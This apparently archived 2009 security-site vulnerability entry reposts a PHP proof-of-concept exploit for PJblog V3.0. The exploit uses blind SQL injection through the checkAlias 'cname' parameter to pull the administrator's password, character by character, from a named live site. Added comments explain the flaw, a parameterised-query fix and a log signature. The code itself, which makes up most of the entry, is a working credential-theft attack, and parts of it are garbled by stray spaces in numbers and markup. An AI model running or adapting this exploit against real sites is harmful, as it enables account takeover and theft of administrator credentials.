PJblog V3.0 0day vulnerability warning - the black bar safety net

2009-04-23T00:00:00
ID MYHACK58:62200923020
Type myhack58
Reporter 佚名
Modified 2009-04-23T00:00:00

Description

Original link:<http://www.0kee.com/read.php?tid-908.html> <? php / PJblog V3. 0 0day exp code by small Roach&bink www.0kee.com www.t00ls.net 09.04.22 /

// Settings used by the requests further down: the base URL of the PJblog site,
// the member name whose row is queried, and the marker string ("check_right")
// that is searched for in each HTTP response.
$url="http://www.pjhome.net"; //inject the address $var_name="puterjam"; //administrator $var_key="check_right";

// Main loop of the published proof of concept: a boolean-based blind SQL injection.
// Each request appends a SQL condition to the `cname` parameter of
// action.asp?action=checkAlias; the condition compares one character of
// blog_member.mem_password with a candidate value, and the answer is read from
// whether the response body contains $var_key.
// Progress is kept in $_SESSION across page reloads: LenI is the current
// position, LenDo the candidate value to resume from, and tmpPassWord the
// characters collected so far.
// NOTE(review): the request shape suggests `cname` reaches a SQL statement
// without parameterisation - confirm against the PJblog action.asp source.
// The corresponding fix is a parameterised query plus an allow-list check on
// alias names before they are used.
// Detection: in web-server logs this shows up as a long run of near-identical
// checkAlias requests from one client, with SQL keywords (select, mid, asc,
// From blog_member) inside cname and only a numeric comparison value changing.
if ($_SESSION["LenI"]){ $LenI=$_SESSION["LenI"]; }else{ $LenI=1; } for($i=$LenI;$i<=4 0;$i++){ if($_SESSION["LenDo"]){ $StaAsc=$_SESSION["LenDo"]; }else{ $StaAsc=3 1; } echo "Scan password len:".$ i." ;asc form ".$ StaAsc." to 1 2 7"; for($j=$StaAsc;$j<=1 2 7;$j++){ $newurl=$url.'/ action. asp? action=checkAlias&cname=firebug_plugins_firediff"%20and%2 0%28select%20top%2 0 1%20asc%28mid%28mem_password%2c'.$ i.'% 2c1%2 9% 2 9%20From%20blog_member%20where%20mem_name=\".$ var_name.'\'% 2 9%3e'.$ j.'% 20and%2 0"1"="1'; $var_pagelen=file_get_contents($newurl); $var_newpagelen=strpos($var_pagelen,$var_key); if($var_newpagelen == true){ $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"]. chr($j); unset($_SESSION["LenDo"]); $_SESSION["LenI"]=$i+1; doReload(); break; } if($j == $StaAsc+1 0){ doReload(); break; } } } if ($_SESSION["LenI"]==4 0 && ! ($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }

// Leaves PHP mode and emits an inline <script> that calls location.reload()
// from a window.setTimeout timer, so the page is requested again and the loop
// above resumes from the state saved in $_SESSION.
function doReload(){ ?& gt; <script language="javascript"> <!-- window. setTimeout('location. reload()',1 0 0 0); //--> </script> <? php } ?& gt;